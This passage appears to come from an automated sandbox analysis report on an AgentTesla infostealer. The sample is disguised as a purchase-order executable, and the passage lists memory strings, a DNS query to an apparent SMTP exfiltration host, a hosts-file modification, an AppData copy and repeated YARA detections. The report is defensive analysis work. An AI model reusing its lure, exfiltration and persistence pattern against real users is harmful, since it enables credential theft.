00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%appdata
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: smtp.transmase.com

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Purchase order 450080088 proj. Allt Charnan.exe
                    .NET source code contains very large array initializations
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b54531E20u002d7AC7u002d4E3Fu002dA3D6u002d2F253551ED56u007d/ED5B17C0u002dA6D7u002d428Du002d887Eu002dAAFCECD5D615.csLarge array initialization: .cctor: array initializer size 11617
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b54531E20u002d7AC7u002d4E3Fu002dA3D6u002d2F253551ED56u007d/ED5B17C0u002dA6D7u002d428Du002d887Eu002dAAFCECD5D615.csLarge array initialization: .cctor: array initializer size 11617
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D44358
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D4BC20
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D44348
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D440B8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D440A9
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AAB338
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA2C3F
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA1900
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA1910
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FCF080
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FCF3C8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FC6120
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BFCCF8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BFBF98
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BF9AE0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BF1FF8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BFB1C2
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BF0040
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B9F88
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B8520
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B3330
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_01274358
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_0127BC20
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_012740A9
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_012740B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_01274348
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD9E40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD15F7
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD02C8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD02B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A4358
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011ABC20
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A40B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A40A9
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A4348
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D59E40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D502C8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D502B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D515F7
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0F380
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0F6C8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C06560
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0CBE4
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_05792120
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579F86B
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_05790040
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579C820
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579BAD0
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06348B77
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634DB40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06342FC0
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634586D
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06342E70
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06340A40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06343FB0
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634B158
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: String function: 05BF5A68 appears 54 times
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000000.239580570.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.293254846.0000000007A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000008.00000000.278239975.0000000000378000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
